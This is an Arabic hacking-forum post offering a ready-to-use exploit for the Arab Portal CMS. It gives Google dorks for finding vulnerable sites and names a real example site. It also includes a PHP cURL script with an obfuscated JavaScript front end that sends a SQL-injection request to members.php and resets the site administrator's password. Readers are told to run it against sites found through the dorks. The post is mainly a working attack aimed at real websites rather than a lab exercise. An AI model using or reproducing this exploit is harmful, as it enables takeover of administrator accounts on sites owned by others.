1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ ثغره ] ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

الموضوع في '[ الـثـغـرات ]' بواسطة Black-Heart, بتاريخ ‏14 نوفمبر 2014.

كاتب الموضوع : Black-Heart المشاهدات : 1,204 الردود : 14 ‏14 نوفمبر 2014
حالة الموضوع:
مغلق
  1. غير متصل

    Black-Heart
    V • I • P

    عضو منذ:
    ‏24 مارس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,987
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    [​IMG]

    كيفكم يا حلوين ان شاء الله بخير

    اطرح لكم ثغرة في سكربت البوابة العربية | Arab Portal

    حبيت انزل لكم استغلال الثغرة مع شويت شرح اتمنى ما أطول عليكم ^_^


    اخليكم مع الشرح :


    [​IMG]

    الدوركات :

    بإستخدام برنامج البوابة العربية 2.2

    بإستخدام برنامج البوابة العربية 3.0

    بإستخدام برنامج البوابة العربية 3.0 copyright©2012 all rights reserved

    موقع كمثال :-

    http://alzaidichair.com/

    نروح نبحث عن اليوزر رقم واحد ( 1 ) في الموقع فيه طريقتين للبحث .

    الطريقة الاولى :

    أنك في الصفحة الرئيسية تحصل مقالات او تدوينات شوف الكاتب

    ضع المؤشر على اسمه راح يظهر لك الرابط بالاسفل تشوف رقم اليوزر بالاخير

    مثل الصورة التالية : -

    [​IMG]


    [​IMG]

    [​IMG]

    [​IMG]

    الطريقة الثانية :-

    انسخ مكان الوصلة للاسم والصقه في مفكرة او تبويب جديد في المتصفح وشوف رقم اليوزر

    كالتالي : -

    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][IMG]http://cdn.top4top.net/i_01a18bca411.png[/IMG]
    [/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]

    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][IMG]http://www.iq-team.org/elan/fol3.png[/IMG]

    [IMG]http://cdn.top4top.net/i_01a18bca412.png[/IMG]
    [/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]

    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][IMG]http://www.iq-team.org/elan/fol3.png[/IMG]

    [IMG]http://cdn.top4top.net/i_01a18bca413.png[/IMG]
    [/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]

    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][IMG]http://www.iq-team.org/elan/fol3.png[/IMG]


    [/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]
    الان ننتقل الى طريقة الاستغلال > طبعا طريقة الاستغلال راح تكون عن طريق

    سكربت خارج الموقع ^^ عن الطريق السيرفر الشخصي , صورة للسكربت :-


    [​IMG]

    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][IMG]http://www.iq-team.org/elan/fol3.png[/IMG]

    الان خلنا نشرح :-

    أول شيء تثبت برنامج السيرفر الشخصي اللي مو مثبت عنده هذا شرح التثبيت :-

    [URL]http://www.iq-team.org/vb/t30171.html[/URL]

    تروح على المتصفح وتكتب localhost/filename.php

    بدل [ filname.php ] تكتب اسم السكربت اللي اساسا راح يكون ArabPortal.php

    اذا ماغيرته يعني تدخل

    [URL]http://localhost/ArabPortal.php[/URL]

    طبعا الدوركات فوق تروح تستخدم أحد الدوركات وتاخذ احد المواقع المصابة

    وتحط رابط الموقع في الفراغ الموضح Site :

    وتظغط على Change Password

    الباسورد اللي راح يصير بعد ما تظغطه

    admin

    اللي حاب يغير الباسورد تعالو نشرح كيف

    هذا كود السكربت :-

    [PHP CODE]<Script Language='Javascript'>
    document.write(unescape('%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%77%69%6E%64%6F%77%73%2D%31%32%35%36%22%20%2F%3E%0A%3C%74%69%74%6C%65%3E%41%72%61%62%50%6F%72%74%61%6C%20%52%65%73%65%74%20%41%64%6D%69%6E%20%50%61%73%73%77%6F%72%64%20%42%79%20%57%6C%64%41%6D%65%52%3C%2F%74%69%74%6C%65%3E%0A%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%64%65%73%63%72%69%70%74%69%6F%6E%22%20%63%6F%6E%74%65%6E%74%3D%22%41%72%61%62%50%6F%72%74%61%6C%20%52%65%73%65%74%20%41%64%6D%69%6E%20%50%61%73%73%77%6F%72%64%20%42%79%20%57%6C%64%41%6D%65%52%22%3E%0A%3C%2F%68%65%61%64%3E%0A%0A%3C%62%6F%64%79%20%62%67%63%6F%6C%6F%72%3D%22%23%30%30%30%30%30%30%22%3E%0A%0A%3C%68%33%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%20%0A%3C%69%6D%67%20%63%6C%61%73%73%3D%22%64%65%63%6F%64%65%64%22%20%61%6C%74%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%69%71%2D%74%65%61%6D%2E%6F%72%67%2F%65%6C%61%6E%2F%69%71%32%33%34%2E%70%6E%67%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%69%71%2D%74%65%61%6D%2E%6F%72%67%2F%65%6C%61%6E%2F%69%71%32%33%34%2E%70%6E%67%22%3E%3C%2F%68%33%3E%0A%3C%68%33%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%20%3C%66%6F%6E%74%20%66%61%63%65%3D%22%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%22%20%63%6F%6C%6F%72%3D%22%23%46%46%30%30%30%30%22%3E%41%72%61%62%50%6F%72%74%61%6C%20%52%65%73%65%74%20%41%64%6D%69%6E%20%50%61%73%73%77%6F%72%64%20%0A%42%79%20%57%6C%64%41%6D%65%52%3C%2F%66%6F%6E%74%3E%3C%2F%68%33%3E%0A%3C%70%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%20%26%6E%62%73%70%3B%3C%2F%70%3E%0A%3C%66%6F%72%6D%20%6D%65%74%68%6F%64%3D%22%50%4F%53%54%22%3E%0A%3C%70%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%3C%62%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%30%30%46%46%30%30%22%20%66%61%63%65%3D%22%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%22%3E%53%69%74%65%20%3A%3C%2F%66%6F%6E%74%3E%3C%2F%62%3E%20%0A%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%74%65%78%74%22%20%6E%61%6D%65%3D%22%75%72%6C%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%73%69%74%65%2E%63%6F%6D%2F%70%6F%72%74%61%6C%2F%22%20%73%69%7A%65%3D%34%30%20%73%74%79%6C%65%3D%22%66%6F%6E%74%2D%73%69%7A%65%3A%20%31%33%70%78%3B%20%63%6F%6C%6F%72%3A%20%23%46%46%30%30%30%30%3B%20%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%3B%20%66%6F%6E%74%2D%77%65%69%67%68%74%3A%20%62%6F%6C%64%3B%20%62%6F%72%64%65%72%3A%20%33%70%78%20%64%6F%75%62%6C%65%20%23%46%46%30%30%30%30%3B%20%70%61%64%64%69%6E%67%2D%6C%65%66%74%3A%20%34%70%78%3B%20%70%61%64%64%69%6E%67%2D%72%69%67%68%74%3A%20%34%70%78%3B%20%70%61%64%64%69%6E%67%2D%74%6F%70%3A%20%31%70%78%3B%20%70%61%64%64%69%6E%67%2D%62%6F%74%74%6F%6D%3A%20%31%70%78%22%20%2F%3E%26%6E%62%73%70%3B%0A%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%73%75%62%6D%69%74%22%20%6E%61%6D%65%3D%22%61%64%64%22%20%76%61%6C%75%65%3D%22%43%68%61%6E%67%65%20%50%61%73%73%77%6F%72%64%22%20%73%74%79%6C%65%3D%22%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%3B%20%66%6F%6E%74%2D%73%69%7A%65%3A%20%31%33%70%78%3B%20%63%6F%6C%6F%72%3A%20%23%30%30%30%30%30%30%3B%20%66%6F%6E%74%2D%77%65%69%67%68%74%3A%20%62%6F%6C%64%3B%20%62%6F%72%64%65%72%3A%20%32%70%78%20%64%61%73%68%65%64%20%23%30%30%46%46%30%30%3B%20%70%61%64%64%69%6E%67%2D%6C%65%66%74%3A%20%34%70%78%3B%20%70%61%64%64%69%6E%67%2D%72%69%67%68%74%3A%20%34%70%78%3B%20%70%61%64%64%69%6E%67%2D%74%6F%70%3A%20%31%70%78%3B%20%70%61%64%64%69%6E%67%2D%62%6F%74%74%6F%6D%3A%20%31%70%78%22%20%2F%3E%3C%2F%70%3E%0A%3C%2F%66%6F%72%6D%3E%0A%3C%70%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%26%6E%62%73%70%3B%3C%2F%70%3E%0A%3C%70%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%3C%62%3E%3C%66%6F%6E%74%20%66%61%63%65%3D%22%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%22%20%73%69%7A%65%3D%22%34%22%20%63%6F%6C%6F%72%3D%22%23%33%33%39%39%46%46%22%3E%53%6B%79%70%65%20%3A%3C%2F%66%6F%6E%74%3E%3C%66%6F%6E%74%20%66%61%63%65%3D%22%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%22%20%73%69%7A%65%3D%22%34%22%20%63%6F%6C%6F%72%3D%22%23%43%43%43%43%43%43%22%3E%20%0A%6C%69%76%65%3A%77%6C%64%61%6D%65%72%3C%2F%66%6F%6E%74%3E%3C%2F%62%3E%3C%2F%70%3E%0A%3C%70%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%3C%62%3E%3C%66%6F%6E%74%20%66%61%63%65%3D%22%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%22%20%73%69%7A%65%3D%22%34%22%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%46%46%30%30%46%46%22%3E%0A%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%6C%64%61%6D%65%72%2E%63%6F%6D%2F%22%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%46%46%30%30%46%46%22%3E%0A%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%57%65%62%3C%2F%73%70%61%6E%3E%3C%2F%66%6F%6E%74%3E%3C%2F%61%3E%3C%2F%66%6F%6E%74%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%6C%64%61%6D%65%72%2E%63%6F%6D%2F%22%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%46%46%46%46%46%46%22%3E%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%53%69%74%65%3C%2F%73%70%61%6E%3E%3C%2F%66%6F%6E%74%3E%3C%2F%61%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%39%39%39%39%39%39%22%3E%20%0A%7E%20%3C%2F%66%6F%6E%74%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%30%30%36%36%46%46%22%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%74%77%69%74%74%65%72%2E%63%6F%6D%2F%77%6C%64%61%6D%65%72%22%3E%0A%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%30%30%36%36%46%46%22%3E%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%54%77%69%74%74%65%72%3C%2F%73%70%61%6E%3E%3C%2F%66%6F%6E%74%3E%3C%2F%61%3E%3C%2F%66%6F%6E%74%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%39%39%39%39%39%39%22%3E%20%0A%7E%20%3C%2F%66%6F%6E%74%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%30%30%39%39%30%30%22%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%61%73%6B%2E%66%6D%2F%77%6C%64%61%6D%65%72%22%3E%0A%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%30%30%39%39%30%30%22%3E%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%41%73%6B%3C%2F%73%70%61%6E%3E%3C%2F%66%6F%6E%74%3E%3C%2F%61%3E%3C%2F%66%6F%6E%74%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%39%39%39%39%39%39%22%3E%20%0A%7E%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%6C%64%61%6D%65%72%2E%74%75%6D%62%6C%72%2E%63%6F%6D%2F%22%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%39%39%39%39%39%39%22%3E%0A%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%54%75%6D%62%6C%72%3C%2F%73%70%61%6E%3E%3C%2F%66%6F%6E%74%3E%3C%2F%61%3E%20%7E%20%3C%2F%66%6F%6E%74%3E%0A%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%33%33%36%36%39%39%22%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%69%6E%73%74%61%67%72%61%6D%2E%63%6F%6D%2F%77%6C%64%61%6D%65%72%22%3E%0A%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%33%33%36%36%39%39%22%3E%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%49%6E%73%74%61%67%72%61%6D%3C%2F%73%70%61%6E%3E%3C%2F%66%6F%6E%74%3E%3C%2F%61%3E%3C%2F%66%6F%6E%74%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%39%39%39%39%39%39%22%3E%20%0A%7E%20%3C%2F%66%6F%6E%74%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%79%6F%75%74%75%62%65%2E%63%6F%6D%2F%75%73%65%72%2F%44%6F%64%69%48%61%63%6B%65%72%22%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%46%46%30%30%30%30%22%3E%0A%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%59%6F%75%3C%2F%73%70%61%6E%3E%3C%2F%66%6F%6E%74%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%46%46%46%46%46%46%22%3E%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%54%75%62%65%3C%2F%73%70%61%6E%3E%3C%2F%66%6F%6E%74%3E%3C%2F%61%3E%3C%2F%66%6F%6E%74%3E%3C%2F%62%3E%3C%2F%70%3E%0A%3C%70%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%33%33%36%36%39%39%22%20%66%61%63%65%3D%22%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%22%3E%26%6E%62%73%70%3B%0A%50%6F%77%65%72%65%64%20%42%79%20%3C%2F%66%6F%6E%74%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%6C%64%61%6D%65%72%2E%63%6F%6D%2F%22%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%0A%3C%66%6F%6E%74%20%66%61%63%65%3D%22%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%22%20%63%6F%6C%6F%72%3D%22%23%46%46%46%46%46%46%22%3E%57%6C%64%41%6D%65%52%3C%2F%66%6F%6E%74%3E%3C%2F%61%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%33%33%36%36%39%39%22%20%66%61%63%65%3D%22%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%22%3E%2E%20%43%6F%70%79%72%69%67%68%74%20%A9%20%0A%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%69%71%2D%74%65%61%6D%2E%6F%72%67%2F%22%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%0A%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%46%46%46%46%46%46%22%3E%49%51%2D%54%65%61%4D%3C%2F%66%6F%6E%74%3E%3C%2F%61%3E%20%49%6E%63%2E%20%28%63%29%20%32%30%31%31%2D%32%30%31%34%20%3C%2F%66%6F%6E%74%3E%0A%3C%2F%70%3E%0A'));
    </Script>

    <?php
    ob_start();
    set_time_limit(0);
    if($_POST['add']){
    echo "<hr>";
    ob_flush();
    flush();
    x0b(trim($_POST['url'])."/members.php?action=uppass","action=uppass&code=1' /*!12345OR*/ 1 = '1&myuserid=1' /*!12345OR*/ useradmin = '1&mynewpass=admin&mynewpass2=admin");
    }
    function x0b($x0b,$x0c){
    $x0d=curl_init();
    curl_setopt($x0d, CURLOPT_URL,$x0b);
    curl_setopt($x0d, CURLOPT_COOKIESESSION, TRUE);
    curl_setopt($x0d, CURLOPT_COOKIEJAR,dirname(__FILE__)."/co.txt");
    curl_setopt($x0d, CURLOPT_COOKIEFILE,dirname(__FILE__)."/co.txt");
    curl_setopt($x0d, CURLOPT_POST, 1);
    curl_setopt($x0d, CURLOPT_POSTFIELDS,$x0c);
    curl_setopt($x0d, CURLOPT_FOLLOWLOCATION,0);
    curl_setopt($x0d, CURLOPT_RETURNTRANSFER,1);
    curl_setopt($x0d, CURLOPT_SSL_VERIFYPEER,0);
    $x0e=curl_exec($x0d);
    curl_close($x0d);
    if(file_exists(dirname(__FILE__)."/co.txt")) unlink(dirname(__FILE__)."/co.txt");
    echo $x0e;
    }
    ?>[/PHP CODE]

    راح تلاحظ في السطر رقم 12

    [PHP CODE] x0b(trim($_POST['url'])."/members.php?action=uppass","action=uppass&code=1' /*!12345OR*/ 1 = '1&myuserid=1' /*!12345OR*/ useradmin = '1&mynewpass=admin&mynewpass2=admin");
    [/PHP CODE]

    تشوف

    [PHP CODE]1&mynewpass=admin&mynewpass2=admin[/PHP CODE]
    [/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]
    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange]
    تغير admin الى الباس اللي تبيه مثلا ابي الباس يكون Black-Heart يصير الكود

    [PHP CODE]1&mynewpass=Black-Heart&mynewpass2=Black-Heart[/PHP CODE]

    [/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]

    [B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][IMG]http://www.iq-team.org/elan/daon2.gif[/IMG]
    أما الان ننتقل الى تحميل السكربت : -[/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B]

